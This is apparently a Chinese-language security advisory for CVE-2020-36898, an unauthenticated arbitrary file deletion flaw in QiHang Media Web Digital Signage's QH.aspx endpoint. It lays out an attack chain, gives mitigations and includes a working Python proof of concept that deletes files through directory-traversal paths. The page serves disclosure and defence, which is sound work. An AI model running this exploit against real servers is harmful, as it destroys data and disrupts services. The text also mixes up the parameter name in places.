CVE-2020-36898 QiHang Media Web数字标牌未授权任意文件删除漏洞

漏洞信息

漏洞编号

CVE-2020-36898

漏洞类型

未授权文件删除

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

QiHang Media Web Digital Signage

漏洞概述

CVE-2020-36898是QiHang Media Web Digital Signage 3.0.9版本中的一个严重安全漏洞。该漏洞存在于QH.aspx端点，由于缺乏适当的身份验证机制，允许远程攻击者在未进行任何认证的情况下删除服务器上的任意文件。攻击者可以通过构造恶意的POST请求，利用data参数传递文件路径，并结合目录遍历序列（如../）来定位和删除目标文件。此漏洞的CVSS评分高达9.1，属于严重级别，对系统机密性、完整性和可用性均造成严重影响。成功利用此漏洞可能导致业务中断、数据丢失，甚至可能被用于进一步的攻击活动，如删除日志文件或安全配置文件以掩盖入侵痕迹。

技术细节

该漏洞的根本原因在于QH.aspx端点缺少访问控制机制。攻击者无需任何凭据即可访问该端点，且端点直接接受用户输入的file参数而未进行充分的路径验证。攻击流程如下：首先，攻击者构造包含目录遍历序列的POST请求到QH.aspx端点，请求中data参数指定目标文件路径（如../../../etc/passwd或../../../webapps/ROOT/somefile）。由于服务器以Web服务权限运行，攻击者可以删除任意权限范围内的文件。值得注意的是，Windows和Unix-like系统的路径遍历语法略有不同，但原理相同。此外，该漏洞可被武器化用于删除关键系统文件或配置文件，造成拒绝服务或提权效果。

攻击链分析

STEP 1

信息收集

攻击者识别目标服务器运行QiHang Media Web Digital Signage 3.0.9，并发现QH.aspx端点存在

STEP 2

漏洞探测

攻击者发送测试请求确认QH.aspx端点无需认证即可访问，并接受data参数

STEP 3

构造恶意请求

攻击者构造包含目录遍历序列的POST请求，指定目标文件路径作为data参数值

STEP 4

触发漏洞

服务器处理请求，执行文件删除操作，攻击者获得任意文件删除能力

STEP 5

扩大攻击影响

攻击者删除关键文件（如日志、配置文件）造成业务中断或掩盖入侵痕迹

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2020-36898 PoC - Unauthenticated Arbitrary File Deletion
# Target: QiHang Media Web Digital Signage 3.0.9 QH.aspx

def delete_file(target_url, file_path):
    """
    Delete arbitrary files on the target server without authentication.
    Args:
        target_url: Base URL of the vulnerable application
        file_path: Path of the file to delete (supports directory traversal)
    """
    endpoint = f"{target_url}/QH.aspx"
    
    # Prepare POST request with file path to delete
    data = {
        'data': file_path
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[*] Request sent to: {endpoint}")
        print(f"[*] Target file: {file_path}")
        print(f"[*] Status code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] File deletion request processed")
        else:
            print("[-] Unexpected response")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <file_path>")
        print(f"Example: python {sys.argv[0]} http://target.com ../../../webapps/ROOT/web.xml")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    delete_file(target, file_path)

影响范围

QiHang Media Web Digital Signage 3.0.9

防御指南

临时缓解措施

立即限制QH.aspx端点的访问权限，实施身份验证机制；对用户输入进行严格的路径验证和白名单过滤；使用文件完整性监控工具实时检测关键文件的变更；考虑临时关闭相关功能直到官方补丁发布。